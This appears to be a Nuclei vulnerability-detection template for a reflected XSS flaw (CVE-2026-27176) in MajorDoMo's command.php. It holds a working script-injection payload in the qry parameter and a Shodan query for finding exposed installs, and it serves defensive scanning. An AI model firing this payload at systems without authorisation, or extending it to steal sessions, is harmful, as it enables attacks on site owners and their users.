id: CVE-2026-27176 info: name: MajorDoMo - Cross-Site Scripting author: DhiyaneshDk severity: medium description: | MajorDoMo contains a reflected XSS caused by unsanitized $qry parameter in command.php, letting attackers inject arbitrary JavaScript via crafted URLs, exploit requires victim to visit malicious URL. impact: | Attackers can execute arbitrary JavaScript in victim's browser, leading to session hijacking or other client-side attacks. remediation: | Sanitize the $qry parameter using htmlspecialchars() or equivalent before rendering. reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-27176 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2026-27176 epss-score: 0.00095 epss-percentile: 0.26603 cwe-id: CWE-79 metadata: verified: true max-request: 1 shodan-query: html:"majordomo" tags: cve,cve2026,xss,majordomo http: - method: GET path: - "{{BaseURL}}/command.php?qry=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E" matchers-condition: and matchers: - type: word part: body words: - '">' - "Command:" condition: and - type: word part: content_type words: - "text/html" - type: status status: - 200 # digest: 490a0046304402204b18395bb8bc234d53175ff43dc06ee1f4dd2cd0c0c0e5db7a94521d7dc2f8b60220631f9427f51936487c7961a8d7ba742370b7856eb69d6008d1e605b8c828a62e:922c64590222798bb761d5b6d8e72950